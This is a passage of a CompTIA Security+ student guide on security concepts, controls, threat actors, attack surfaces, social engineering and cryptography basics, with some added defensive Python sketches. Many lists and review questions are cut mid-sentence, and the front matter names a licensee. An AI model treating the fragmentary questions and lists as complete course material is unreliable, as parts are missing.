Downloadable Official CompTIA Security+ Student Guide
CompTIA
Security+
Student Guide
(Exam SY0-701)
Acknowledgments
Notices
Disclaimer
While CompTIA, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity’s products, or
another entity’s product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain
links to sites on the Internet that are owned and operated by third parties (the “External Sites”). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.
Trademark Notice
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries. All
other product and service names used may be common law or registered trademarks of their respective proprietors.
Copyright Notice
Copyright © 2023 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Table of Contents
Solutions......................................................................................................................... S-1
Glossary...........................................................................................................................G-1
Index................................................................................................................................. I-1
Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA
Security+ (Exam SY0-701) certification examination, this course can be a significant
part of your preparation. But certification is not the only key to professional
success in the field of IT security. Today's job market demands individuals with
demonstrable skills, and the information and activities in this course can help you
build your cybersecurity skill set so that you can confidently perform your duties in
any entry-level security role.
On course completion, you will be able to do the following:
• Summarize fundamental security concepts.
Target Student
The Official CompTIA Security+ (Exam SY0-701) is the primary course you will need to
take if your job responsibilities include safeguarding networks, detecting threats,
and securing data in your organization. You can take this course to prepare for the
CompTIA Security+ (Exam SY0-701) certification examination.
Prerequisites
To ensure your success in this course, you should have a minimum of two years
of experience in IT administration with a focus on security, hands-on experience
with technical information security, and a broad knowledge of security concepts.
CompTIA A+ and CompTIA Network+, or the equivalent knowledge, is strongly
recommended.
The prerequisites for this course might differ significantly from the prerequisites for
the CompTIA certification exams. For the most up-to-date information about the exam
prerequisites, complete the form on this page: www.comptia.org/training/resources/exam-objectives.
As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target job roles. Each lesson is composed of a number of
topics. A topic contains subjects that are related to a discrete job task, mapped
to objectives and content examples in the CompTIA exam objectives document.
Rather than follow the exam domains and objectives sequence, lessons and topics
are arranged in order of increasing proficiency. Each topic is intended to be studied
within a short period (typically 30 minutes at most). Each topic is concluded by one
or more activities, designed to help you to apply your understanding of the study
notes to practical scenarios and tasks.
In addition to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an index to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and
topic content.
In many electronic versions of the book, you can click links on key words in the topic
content to move to the associated glossary definition, and on page references in the
index to move to that term in the content. To return to the previous location in the
document after clicking a link, use the appropriate functionality in your eBook
viewing software.
As You Review
Any method of instruction is only as effective as the time and effort you, the
student, are willing to invest in it. In addition, some of the information that you
learn in class may not be important to you immediately, but it may become
important later. For this reason, we encourage you to spend some time reviewing
the content of the course after your time in the classroom.
Following the lesson content, you will find a table mapping the lessons and topics
to the exam domains, objectives, and content examples. You can use this as a
checklist as you prepare to take the exam and to review any content that you are
uncertain about.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Guidelines can be used during class and as after-class references when
you're back on the job and need to refresh your understanding. Taking advantage
of the glossary, index, and table of contents, you can use this book as a first source
of definitions, background information, and summaries.
LESSON INTRODUCTION
Security is an ongoing process that includes assessing requirements, setting
up organizational security systems, hardening and monitoring those systems,
responding to attacks in progress, and deterring attackers. If you can summarize
the fundamental concepts that underpin security functions, you can contribute
more effectively to a security team. You must also be able to explain the importance
of compliance factors and best practice frameworks in driving the selection of
security controls and how departments, units, and professional roles within
different types of organizations implement the security function.
Lesson Objectives
In this lesson, you will do the following:
• Summarize information security concepts.
Topic 1A
Security Concepts
Information Security
Information security (infosec) refers to the protection of data resources from
unauthorized access, attack, theft, or damage. Data may be vulnerable because of
the way it is stored, transferred, or processed. The systems used to store, transmit,
and process data must demonstrate the properties of security. Secure information
has three properties, often referred to as the CIA Triad:
• Confidentiality means that information can only be read by people who have
been explicitly authorized to access it.
• Integrity means that the data is stored and transferred as intended and that
any modification is authorized.
• Availability means that information is accessible to those authorized to view
or modify it.
The triad can also be referred to as "AIC" to avoid confusion with the Central Intelligence
Agency.
Some security models and researchers identify other properties of secure systems.
The most important of these is non-repudiation. Non-repudiation means that a
person cannot deny doing something, such as creating, modifying, or sending a
resource. For example, a legal document, such as a will, must usually be witnessed
when it is signed. If there is a dispute about whether the document was correctly
executed, the witness can provide evidence that it was.
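As an illustration of the integrity property, a recorded hash lets a receiver detect unauthorized modification of data in transit. This is a minimal sketch using Python's standard hashlib; the messages are hypothetical and not part of the official course content.

```python
import hashlib

def sha256_digest(data: bytes) -> str:
    """Return the SHA-256 hex digest of a byte string."""
    return hashlib.sha256(data).hexdigest()

# The sender records the digest of the data as transmitted...
original = b"Pay $100 to account 12345"
recorded_digest = sha256_digest(original)

# ...and the receiver recomputes it to detect unauthorized modification.
received = b"Pay $900 to account 99999"
if sha256_digest(received) != recorded_digest:
    print("Integrity check failed: data was modified in transit")
```

In practice the recorded digest must itself be protected (for example, by a digital signature), or an attacker could simply replace both the data and the hash.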
Cybersecurity Framework
Within the goal of ensuring information security, cybersecurity refers specifically
to provisioning secure processing hardware and software. Information security
and cybersecurity tasks can be classified as five functions, following the framework
developed by the National Institute of Standards and Technology (NIST)
(nist.gov/cyberframework/online-learning/five-functions):
• Identify—develop security policies and capabilities. Evaluate risks, threats, and
vulnerabilities and recommend security controls to mitigate them.
NIST’s framework is just one example. There are many other cybersecurity
frameworks (CSFs).
Gap Analysis
Each security function is associated with a number of goals or outcomes. For
example, one outcome of the Identify function is an inventory of the assets owned
and operated by the company. Outcomes are achieved by implementing one or
more security controls.
Numerous categories and types of security controls cover a huge range of
functions. This makes selection of appropriate and effective controls difficult.
A cybersecurity framework guides the selection and configuration of controls.
Frameworks are important because they save an organization from building its
security program in a vacuum, or from building the program on a foundation that
fails to account for important security concepts.
The use of a framework allows an organization to make an objective statement
of its current cybersecurity capabilities, identify a target level of capability, and
prioritize investments to achieve that target. This gives a structure to internal
risk management procedures and provides an externally verifiable statement of
regulatory compliance.
Gap analysis is a process that identifies how an organization’s security systems
deviate from those required or recommended by a framework. This will be
performed when first adopting a framework or when meeting a new industry or
legal compliance requirement. The analysis might be repeated every few years to
meet compliance requirements or to validate any changes that have been made to
the framework.
For each section of the framework, a gap analysis report will provide an overall
score, a detailed list of missing or poorly configured controls associated with that
section, and recommendations for remediation.
Summary of gap analysis findings showing number of recommended controls not implemented
per function and category; plus risks to confidentiality, integrity, and availability from missing
controls; and target remediation date.
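A gap analysis score of the kind described above can be sketched as a tally of implemented versus recommended controls per framework function. The function names follow the NIST CSF, but the counts are hypothetical.

```python
# Hypothetical gap-analysis data: for each framework function, the number of
# recommended controls and how many are currently implemented.
controls = {
    "Identify": {"recommended": 20, "implemented": 15},
    "Protect":  {"recommended": 30, "implemented": 21},
    "Detect":   {"recommended": 15, "implemented": 9},
    "Respond":  {"recommended": 10, "implemented": 8},
    "Recover":  {"recommended": 8,  "implemented": 4},
}

def gap_report(controls):
    """Return per-function missing-control counts and an overall 0-100 score."""
    missing = {fn: c["recommended"] - c["implemented"] for fn, c in controls.items()}
    total_rec = sum(c["recommended"] for c in controls.values())
    total_imp = sum(c["implemented"] for c in controls.values())
    score = round(100 * total_imp / total_rec)
    return missing, score

missing, score = gap_report(controls)
```

A real report would also weight controls by risk and attach remediation recommendations; this sketch only shows the arithmetic behind an overall score.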
While some or all work involved in gap analysis could be performed by the internal
security team, a gap analysis is likely to involve third-party consultants. Frameworks
and compliance requirements from regulations and legislation can be complex enough
to require a specialist. Advice and feedback from an external party can alert the internal
security team to oversights and to new trends and changes in best practice.
Access Control
An access control system ensures that an information system meets the goals of
the CIA triad. Access control governs how subjects/principals may interact with
objects. Subjects are people, devices, software processes, or any other system
that can request and be granted access to a resource. Objects are the resources.
An object could be a network, server, database, app, or file. Subjects are assigned
rights or permissions on resources.
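The subject/object model described above can be sketched as a simple access control list that maps subjects to the rights they hold on each resource. The subjects, resource name, and rights here are hypothetical examples, not a production IAM implementation.

```python
# Hypothetical access control list: (subject, object) pairs mapped to the
# set of rights granted on that resource.
acl = {
    ("alice", "sales.db"): {"read", "write"},
    ("bob", "sales.db"): {"read"},
    ("backup-svc", "sales.db"): {"read"},
}

def is_authorized(subject: str, obj: str, right: str) -> bool:
    """Grant access only if the subject holds the requested right on the object."""
    return right in acl.get((subject, obj), set())
```

Note that a subject with no entry at all (an unknown principal) is denied by default, which reflects the usual implicit-deny posture of access control systems.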
Modern access control is typically implemented as an identity and access
management (IAM) system. IAM comprises four main processes:
• Identification—creating an account or ID that uniquely represents the user,
device, or process on the network.
The servers and protocols that implement these functions can also be referred to as
authentication, authorization, and accounting (AAA). The use of IAM to describe
enterprise security workflows is becoming more prevalent as the importance of the
identification process is better acknowledged.
For example, if you are setting up an e-commerce site and want to enroll users, you
need to select the appropriate controls to perform each function:
• Identification—ensure that customers are legitimate. For example, you might
need to ensure that billing and delivery addresses match and that they are not
trying to use fraudulent payment methods.
• Accounting—the system must record the actions a customer takes (to ensure
that they cannot deny placing an order, for instance).
Remember that these processes apply both to people and to systems. For example,
you need to ensure that your e-commerce server can authenticate its identity when
customers connect to it using a web browser.
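The accounting function described above can be sketched as an append-only audit trail; the actor names and actions are hypothetical, and a real system would write to tamper-resistant storage rather than an in-memory list.

```python
from datetime import datetime, timezone

# A minimal audit trail supporting the accounting function: every action is
# recorded with an actor, a description, and a UTC timestamp.
audit_log = []

def record_action(actor: str, action: str) -> None:
    """Append an immutable record of who did what, and when."""
    audit_log.append({
        "actor": actor,
        "action": action,
        "timestamp": datetime.now(timezone.utc).isoformat(),
    })

record_action("customer-1001", "placed order #A-57")
record_action("customer-1001", "updated delivery address")
```

Because each record identifies the actor and the time of the action, such a trail is what allows the business to show that a customer cannot plausibly deny placing an order.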
Review Activity:
Security Concepts
Topic 1B
Security Controls
Although it uses a different scheme, be aware of the way the National Institute of
Standards and Technology (NIST) classifies security controls
(csrc.nist.gov/publications/detail/sp/800-53/rev-5/final).
• Detective—the control may not prevent or deter access, but it will identify and
record an attempted or successful intrusion. A detective control operates during
an attack. Logs provide one of the best examples of detective-type controls.
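As a sketch of a log-based detective control, the following parses hypothetical authentication log lines and flags sources with repeated failed logins. The log format, source addresses, and threshold are assumptions, not a real SIEM rule.

```python
from collections import Counter

# Hypothetical authentication log lines; a real detective control would read
# these from a log file or a SIEM rather than an in-memory list.
log_lines = [
    "FAILED login user=admin src=203.0.113.9",
    "FAILED login user=admin src=203.0.113.9",
    "OK     login user=jsmith src=198.51.100.4",
    "FAILED login user=root src=203.0.113.9",
]

def flag_suspicious(lines, threshold=3):
    """Detective control: flag sources with repeated failed logins."""
    failures = Counter(
        line.split("src=")[1] for line in lines if line.startswith("FAILED")
    )
    return [src for src, count in failures.items() if count >= threshold]
```

The control does not block the attempts; it records and surfaces them so that an analyst or an automated response can act.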
• Managers may have responsibility for a domain, such as building control, web
services, or accounting.
• Nontechnical staff have the responsibility of complying with policy and with any
relevant legislation.
• External responsibility for security (due care or liability) lies mainly with directors
or owners, though again it is important to note that all employees share some
measure of responsibility.
NIST's National Initiative for Cybersecurity Education (NICE) categorizes job tasks and
job roles within the cybersecurity industry (nist.gov/itl/applied-cybersecurity/nice/nice-framework-resource-center).
• Set up and maintain document access control and user privilege profiles.
• Monitor audit logs, review user privileges, and document access controls.
• Create and test business continuity and disaster recovery plans and procedures.
A security operations center (SOC) provides resources and personnel to implement rapid incident
detection and response, plus oversight of cybersecurity operations.
(Image © gorodenkoff 123RF.com.)
DevSecOps
Network operations and use of cloud computing make ever-increasing use of
automation through software code. Traditionally, software code would be the
responsibility of a programming or development team. Separate development and
operations departments or teams can lead to silos, where each team does not work
effectively with the other.
Development and operations (DevOps) is a cultural shift within an organization
to encourage much more collaboration between developers and systems
administrators. By creating a highly orchestrated environment, IT personnel
and developers can build, test, and release software faster and more reliably.
DevSecOps extends the boundary to security specialists and personnel, reflecting
the principle that security is a primary consideration at every stage of software
development and deployment. This is also known as shift left, meaning that
security considerations need to be made during requirements and planning
phases, not grafted on at the end. The principle of DevSecOps recognizes this and
shows that security expertise must be embedded into any development project.
Ancillary to this is the recognition that security operations can be conceived of as
software development projects. Security tools can be automated through code.
Consequently, security operations need to take on developer expertise to improve
detection and monitoring.
Incident Response
A dedicated computer incident response team (CIRT)/computer security incident
response team (CSIRT)/computer emergency response team (CERT) is a single point
of contact for the notification of security incidents. This function might be handled
by the SOC or it might be established as an independent business unit.
Review Activity:
Security Controls
around its premises. What class and function is this security control?
intellectual property (IP) data, plus personal data for its customers and
account holders. What type of business unit can be used to manage such
important and complex security requirements?
Lesson 1
Summary
You should be able to compare and contrast security controls using categories and
functional types. You should also be able to explain how general security concepts
and frameworks are used to develop and validate security policies and control
selection.
• Assign roles so that security tasks and responsibilities are clearly understood
and that impacts to security are assessed and mitigated across the organization.
• Identify and assess the laws and industry regulations that impose compliance
requirements on your business.
LESSON INTRODUCTION
To make an effective security assessment, you must be able to explain strategies
for both defense and attack. Your responsibilities are likely to lie principally in
defending assets, but to do this you must be able to explain the tactics, techniques,
and procedures of threat actors. You must also be able to differentiate the types
and capabilities of threat actors and the ways they can exploit the attack surface
that your networks and systems expose.
Lesson Objectives
In this lesson, you will do the following:
• Compare and contrast attributes and motivations of threat actor types.
Topic 2A
Threat Actors
When you assess your organization’s security posture, you must apply the concepts of
vulnerability, threat, and risk. Risk is a measure of the likelihood and impact of a threat
actor being able to exploit a vulnerability in your organization’s security systems.
To evaluate these factors, you must be able to evaluate the sources of threats or
threat actors. This topic will help you to classify and evaluate the motivation and
capabilities of threat actor types so that you can assess and mitigate risks more
effectively.
Internal/External
Internal/external refers to the degree of access that a threat actor possesses
before initiating an attack. An external threat actor has no account or authorized
access to the target system. A malicious external threat must infiltrate the security
system using unauthorized access, such as breaking into a building or hacking
into a network. Note that an external actor may perpetrate an attack remotely or
on-premises. It is the threat actor that is external rather than the attack method.
Conversely, an internal/insider threat actor has been granted permissions on the
system. This typically means an employee, but insider threats can also arise from
contractors and business partners.
Level of Sophistication/Capability
Level of sophistication/capability refers to a threat actor’s ability to use advanced
exploit techniques and tools. The least capable threat actor relies on commodity
attack tools that are widely available. More capable actors can fashion new exploits
in operating systems, applications software, and embedded control systems. At the
highest level, a threat actor might use non-cyber tools such as political or military
assets.
Resources/Funding
A high level of capability must be supported by resources/funding. Sophisticated
threat actor groups need to be able to acquire resources, such as customized attack
tools and skilled strategists, designers, coders, hackers, and social engineers. The
most capable threat actor groups receive funding from nation-states and organized
crime.
You can relate these strategies to the way they affect the CIA triad: data exfiltration
compromises confidentiality, disinformation attacks integrity, and service disruption
targets availability.
Chaotic Motivations
In the early days of the Internet, many service disruption and disinformation attacks
were perpetrated with the simple goal of causing chaos. Hackers might deface
websites or release worms that brought corporate networks to a standstill for no
other reason than to gain credit for the hack.
This type of vandalism for its own sake is less prevalent now. Attackers might use
service disruption and disinformation to further political ends, or nation-states
might use it to further war aims. Another risk is threat actors motivated by revenge.
Revenge attacks might be perpetrated by an employee or former employee or by
any external party with a grievance.
Financial Motivations
As hacking and malware became both more sophisticated and better commodified,
the opportunities to use them for financial gain grew quickly. If an attacker is able to
steal data, they might be able to sell it to other parties. Alternatively, they might use
an attack to threaten the victim with blackmail or extortion or to perpetrate fraud:
• Blackmail is demanding payment to prevent the release of information. A threat
actor might have stolen information or created false data that makes it appear
as though the target has committed a crime.
• Fraud is falsifying records. Internal fraud might involve tampering with accounts
to embezzle funds or inventing customer details to launder money. Criminals
might use disinformation to commit fraud, such as posting fake news to affect
the share price of a company, to promote pyramid schemes, or to create fake
companies.
Political Motivations
A political motivation means that the threat actor uses an attack to bring about
some type of change in society or governance. This can cover a very wide range of
motivations:
• An employee acting as a whistleblower because of some ethical concern about
the organization’s behavior.
There is also the threat of commercial espionage, where a company attempts to steal
the secrets of a competitor.
Hackers
Hacker describes an individual who has the skills to gain access to computer
systems through unauthorized or unapproved means. Originally, hacker was a
neutral term for a user who excelled at computer programming and computer
system administration. Hacking into a system was a sign of technical skill and
creativity that gradually became associated with illegal or malicious system
intrusions. The terms unauthorized (previously known as black hat) and
authorized (previously known as white hat) are used to distinguish these
motivations. An authorized (white hat) hacker always seeks permission to perform
penetration testing of private and proprietary systems.
Unskilled Attackers
An unskilled attacker is someone who uses hacker tools without necessarily
understanding how they work or having the ability to craft new attacks. Unskilled
attacks might have no specific target or any reasonable goal other than gaining
attention or proving technical abilities.
Nation-State Actors
Most nation-states have developed cybersecurity expertise and will use cyber
weapons to achieve military and commercial goals. The security company
Mandiant’s APT1 report into Chinese cyber espionage units shaped the language
and understanding of cyber-attack lifecycles.
The term advanced persistent threat (APT) was coined to understand the
behavior underpinning modern types of cyber adversaries. Rather than think in
terms of systems being infected with a virus or Trojan, an APT refers to the ability
of an adversary to achieve ongoing compromise of network security—to obtain and
maintain access—using a variety of tools and techniques.
Nation-state actors have been implicated in many attacks, particularly on energy,
health, and electoral systems. The goals of state actors are primarily disinformation
and espionage for strategic advantage, but countries—North Korea being a good
example—are known to target companies for financial gain.
Researchers such as The MITRE Corporation report on the activities of organized crime and
nation-state actors. (Screenshot © 2023 The MITRE Corporation. This work is reproduced
and distributed with the permission of The MITRE Corporation.)
State actors will work at arm’s length from the national government, military, or
security service that sponsors and protects them, maintaining “plausible deniability.”
They are likely to pose as independent groups or even as hacktivists. They may
wage false flag disinformation campaigns that try to implicate other states.
There is the blurred case of former insiders, such as ex-employees now working at
another company or who have been dismissed and now harbor a grievance. These can
be classified as internal threats or treated as external threats with insider knowledge,
and possibly some residual permissions, if effective offboarding controls are not
in place.
The main motivators for a malicious internal threat actor are revenge and financial
gain. Like external threats, insider threats can be opportunistic or targeted. An
employee who plans and executes a campaign to modify invoices and divert funds
is launching a structured attack; an employee who tries to guess the password
on the salary database a couple of times, having noticed that the file is available
on the network, is perpetrating an opportunistic attack. You must also assess the
possibility that an insider threat may be working in collaboration with an external
threat actor or group.
Review Activity:
Threat Actors
at one of your application servers. The email suggests you engage the
hacker for a day’s consultancy to patch the vulnerability. How should
you categorize this threat?
political change?
5. Which three types of threat actor are most likely to have high levels of
funding?
Topic 2B
Attack Surfaces
Understanding the methods by which threat actors infiltrate networks and systems
is essential for you to assess the attack surface of your networks and deploy
controls to block attack vectors.
An organization has an overall attack surface. You can also assess attack surfaces at
more limited scopes, such as that of a single server or computer, a web application, or
employee identities and accounts.
To evaluate the attack surface, you need to consider the attributes of threat actors
that pose the most risk to your organization. For example, the attack surface for an
external actor should be far smaller than that for an insider threat.
From a threat actor’s perspective, each part of the attack surface represents a
potential vector for attempting an intrusion. A threat vector is the path that a
threat actor uses to execute a data exfiltration, service disruption, or disinformation
attack. Sophisticated threat actors will make use of multiple vectors. They are likely
to plan a multistage campaign, rather than a single “smash and grab” type of raid.
Highly capable threat actors will be able to develop novel vectors. This means that
the threat actor’s knowledge of your organization’s attack surface may be better
than your own.
The terms "threat vector" and "attack vector" are often taken to mean the same thing.
Some sources use threat vector when analyzing the potential attack surface and
attack vector when analyzing an exploit that has actually been executed.
One strategy for dealing with unsupported apps that cannot be replaced is to try to
isolate them from other systems. The idea is to reduce opportunities for a threat actor
to access the vulnerable app and run exploit code. Using isolation as a substitute for
patch management is an example of a compensating control.
Network Vectors
Vulnerable software gives a threat actor the opportunity to execute malicious code
on a system. To do this, the threat actor must be able to run exploit code on the
system or over a network to trigger the vulnerability. An exploit technique for any
given software vulnerability can be classed as either remote or local:
• Remote means that the vulnerability can be exploited by sending code to the
target over a network and does not depend on an authenticated session with the
system to execute.
• Local means that the exploit code must be executed from an authenticated
session on the computer. The attack could still occur over a network, but the
threat actor needs to use some valid credentials or hijack an existing session to
execute it.
• Cloud Access—many companies now run part or all of their network services via
Internet-accessible clouds. The attacker only needs to find one account, service,
or host with weak credentials to gain access. The attacker is likely to target the
accounts used to develop services in the cloud or manage cloud systems. They
may also try to attack the cloud service provider (CSP) as a way of accessing the
victim system.
Servers have to open necessary ports to make authorized network applications and
services work. However, as part of reducing the attack surface, servers should not be
configured to allow traffic on any unnecessary ports. Networks can use secure design
principles, access control, firewalls, and intrusion detection to reduce the attack surface.
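The principle of closing unnecessary ports can be sketched as a simple comparison between a server's listening ports and an approved baseline for its role. The port numbers here are hypothetical; a real check would pull the listening set from the host (for example, from `ss` or `netstat` output).

```python
# Hypothetical snapshot of listening ports on a web server, compared against
# the set approved for its role; anything else widens the attack surface.
approved_ports = {22, 443}
listening_ports = {22, 443, 3389, 8080}

unnecessary = sorted(listening_ports - approved_ports)
for port in unnecessary:
    print(f"Port {port} is open but not approved: close it or justify it")
```

Running such a comparison regularly turns the "no unnecessary ports" guideline into a measurable, auditable control.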
Lure-Based Vectors
A lure is something superficially attractive or interesting that causes its target to
want it, even though it may be concealing something dangerous, like a hook. In
cybersecurity terms, when the target opens the file "bait," it delivers a malicious
payload "hook" that will typically give the threat actor control over the system or
perform service disruption.
If the threat actor cannot gain sufficient access to run a remote or local exploit
directly, a lure might trick a user into facilitating the attack. The following media are
commonly used as lures:
• Removable Device—the attacker conceals malware on a USB thumb drive or
memory card and tries to trick employees into connecting the media to a PC,
laptop, or smartphone. For some exploits, simply connecting the media may
be sufficient to run the malware. More typically, the attacker may need the
employee to open a file in a vulnerable application or run a setup program.
In a drop attack, the threat actor simply leaves infected USB sticks in office grounds,
reception areas, or parking lots in the expectation that at least one employee will pick
one up and plug it into a computer.
• Image Files—the threat actor conceals exploit code within an image file that
targets a vulnerability in browser or document editing software.
These vectors expose a large and diverse attack surface, from the USB and flash
card readers installed on most computers to the software used to browse websites
and view/edit documents. Reducing this attack surface requires effective endpoint
security management, using controls such as vulnerability management, antivirus,
program execution control, and intrusion detection.
Message-Based Vectors
When using a file-based lure, the threat actor needs a mechanism to deliver the
file and a message that will trick a user into opening the file on their computer.
Consequently, any features that allow direct messaging to network users must be
considered as part of the potential attack surface:
• Email—the attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments. The attacker needs to use
social engineering techniques to persuade or trick the user into opening the
attachment.
• Short Message Service (SMS)—the file or a link to the file is sent to a mobile
device using the text messaging handler built into smartphone firmware
and a protocol called Signaling System 7 (SS7). SMS and the SS7 protocol are
associated with numerous vulnerabilities. Additionally, an organization is unlikely
to have any monitoring capability for SMS as it is operated by the handset or
subscriber identity module (SIM) card provider.
• Instant Messaging (IM)—there are many replacements for SMS that run on
Windows, Android, or iOS devices. These can support voice and video messaging
plus file attachments. Most of these services are secured using encryption and
offer considerably more security than SMS, but they can still contain software
vulnerabilities. The use of encryption can make it difficult for an organization to
scan messages and attachments for threats.
The most powerful exploits are zero-click. Most file-based exploit code has to be
deliberately opened by the user. Zero-click means that simply receiving an attachment
or viewing an image on a webpage triggers the exploit.
For most businesses, use of reputable vendors will represent the best practical effort at
securing the supply chain. Government, military/security services, and large enterprises
will exercise greater scrutiny. Particular care should be taken if using secondhand
machines.
Review Activity:
Attack Surfaces
Topic 2C
Social Engineering
Human Vectors
Adversaries can use a diverse range of techniques to compromise a security system.
A prerequisite of many types of attacks is to obtain information about the network
and security system. This knowledge is not only stored on computer disks; it also
exists in the minds of employees and contractors. The people operating computers
and accounts are a part of the attack surface referred to as human vectors.
Social engineering refers to means of either eliciting information from someone
or getting them to perform some action for the threat actor. It can also be referred
to as “hacking the human.” A threat actor might use social engineering to gather
intelligence as reconnaissance in preparation for an intrusion or to effect an actual
intrusion by obtaining account credentials or persuading the target to run malware.
There are many diverse social engineering strategies, but to illustrate the concept,
consider the following scenarios:
• A threat actor creates an executable file that prompts a network user for their
password and then records whatever the user inputs. The attacker then emails
the executable file to the user with the story that the user must open the file and
log on to the network again to clear up some login problems the organization
has been experiencing that morning. After the user complies, the attacker now
has access to their network credentials.
• A threat actor triggers a fire alarm and then slips into the building during the
confusion and attaches a monitoring device to a network port.
The classic impersonation attack is for the social engineer to phone into a
department, claim they have to adjust something on the user’s system remotely,
and then get the user to reveal their password.
Do you really know who's on the other end of the line? (Image © 123RF.com.)
The use of a carefully crafted story with convincing or intimidating details is referred
to as pretexting. Making a convincing impersonation to either charm or intimidate
a target usually depends on the attacker obtaining privileged information about
the organization. For example, when the attacker impersonates a member of the
organization’s IT support team, the attack will be more effective with the identity
details of the person being impersonated and the target.
Some social engineering techniques are dedicated to obtaining this type of
intelligence as a reconnaissance activity. As most companies are oriented
toward customer service rather than security, this information is typically quite easy to
come by. Information that might seem innocuous—such as department employee
lists, job titles, phone numbers, diaries, invoices, or purchase orders—can help an
attacker penetrate an organization through impersonation.
Example phishing email. The formatted version (left) is designed to disguise the
nature of the links; on the right, the mail client has stripped out the formatting
to show the message in its true form.
Phishing refers specifically to email or text message threat vectors. The same sort of
attack can be performed over other types of media:
• Vishing—a phishing attack conducted through a voice channel (telephone or
VoIP, for instance). For example, targets could be called by someone purporting
to represent their bank asking them to verify a recent credit card transaction and
requesting their security details. It can be much more difficult for someone to
refuse a request made in a phone call compared to one made in an email.
Rapid improvements in deep fake technology are likely to make phishing attempts via
voice and even video messaging more prevalent in the future.
• SMiShing—a phishing attack that uses Short Message Service (SMS) text
communications as the vector.
Direct messages to a single contact have a high chance of failure. Other social
engineering techniques still use spoofed resources, such as fake sites and login
pages, but rely on redirection or passive methods to entrap victims.
Typosquatting
Phishing and pharming both depend on impersonation to succeed. The spoofed
message or site must appear to derive from a source that the target trusts. A
threat actor can use various inconsistencies in the way the message’s source is
represented in a mail client to trick the target into trusting the message source.
Email client software does not always identify the actual email address used to
send the message. Instead, it displays a “From” field where a threat actor can add
an arbitrary value. This technique is less common now as filtering software can be
configured to alert the user to any discrepancy between the actual and claimed
sender addresses.
Typosquatting means that the threat actor registers a domain name very similar
to a real one, such as exannple.com, hoping that users will not notice the difference
and assume they are browsing a trusted site or receiving email from a known
source. These are also referred to as cousin, lookalike, or doppelganger domains.
Another technique is to register a hijacked subdomain using the primary domain
of a trusted cloud provider, such as onmicrosoft.com. If a phishing message
appears to come from example.onmicrosoft.com, many users will be
inclined to trust it.
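A rough sketch of how a filter might flag a lookalike domain using string similarity. The helper name and threshold here are invented for illustration only; production anti-phishing filters use far more sophisticated analysis (homoglyph detection, reputation data, and so on).

```python
import difflib

# Hypothetical helper (not from this guide): flag domains that closely
# resemble a trusted domain but are not an exact match, as a crude
# typosquatting check based on string similarity.
def looks_like_typosquat(candidate, trusted, threshold=0.8):
    if candidate == trusted:
        return False  # exact match is the genuine domain
    ratio = difflib.SequenceMatcher(None, candidate, trusted).ratio()
    return ratio >= threshold

print(looks_like_typosquat("exannple.com", "example.com"))  # True
print(looks_like_typosquat("comptia.org", "example.com"))   # False
```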
Some sources use the term "business email compromise" to mean an attack with a
specific financial motivation, where the objective is to persuade a budget holder to
authorize a fraudulent payment or wire transfer. Similar terminology for highly targeted
attacks includes spear phishing, whaling, CEO fraud (impersonating the CEO), and
angler phishing (using social media as the vector).
Review Activity:
Social Engineering
1. The help desk takes a call, and the caller states that she cannot connect
to the e-commerce website to check her order status. She would also
like a username and password. The user gives a valid customer company
name but is not listed as a contact in the customer database. The user
does not know the correct company code or customer ID. Is this likely to
be a social engineering attempt, or is it a false alarm?
4. A company policy states that any wire transfer above a certain value
must be authorized by two employees, who must separately perform
due diligence to verify invoice details. What specific type of social
engineering is this policy designed to mitigate?
Lesson 2
Summary
You should be able to explain how to assess external and insider threat actor types
in terms of intent and capability. You should also be able to summarize the vectors
that make up an organization’s attack surface.
• Use research to extend understanding of the attack surface into specific threat
vectors such as vulnerable software, unsecure networks, supply chain, and
message-based attacks and lures that target the human vector.
LESSON INTRODUCTION
The protect cybersecurity function aims to build secure IT processing systems that
exhibit the attributes of confidentiality, integrity, and availability. Many of these
systems depend wholly or in part on cryptography.
As an information security professional, you must understand the concepts
underpinning cryptographic algorithms and their implementation in secure
protocols and services. A strong technical understanding of the subject will enable
you to explain the importance of cryptographic systems and to select appropriate
technologies to meet a given security goal.
Lesson Objectives
In this lesson, you will do the following:
• Compare and contrast cryptographic algorithms.
Topic 3A
Cryptographic Algorithms
Cryptographic Concepts
Cryptography, which literally means “secret writing,” is the art of making
information secure by encoding it. This is the opposite of security through
obscurity. Security through obscurity means keeping something a secret by hiding
it. This is considered impossible (or at least high risk) on a computer system. With
cryptography, it does not matter if third parties know of the existence and location
of the secret, because they can never understand what it is without the means to
decode it.
The following terminology is used to discuss cryptography:
• Plaintext (or cleartext)—is an unencrypted message.
There are three main types of cryptographic algorithms with different roles to play
in the assurance of the security properties confidentiality, integrity, availability, and
non-repudiation. These types are hashing algorithms and two types of encryption
ciphers: symmetric and asymmetric.
Symmetric Encryption
An encryption algorithm or cipher is a type of cryptographic process that encodes
data so that it can be stored or transmitted securely and then decrypted only by its
owner or its intended recipient. Using a key with the encryption cipher ensures that
decryption can only be performed by an authorized person.
Symmetric Algorithms
A symmetric algorithm is one in which encryption and decryption are both
performed by the same secret key. The secret key must be kept known to
authorized persons only. If the key is lost or stolen, the security is breached.
Symmetric encryption is used for confidentiality. For example, Alice and Bob can
share a confidential file in the following way:
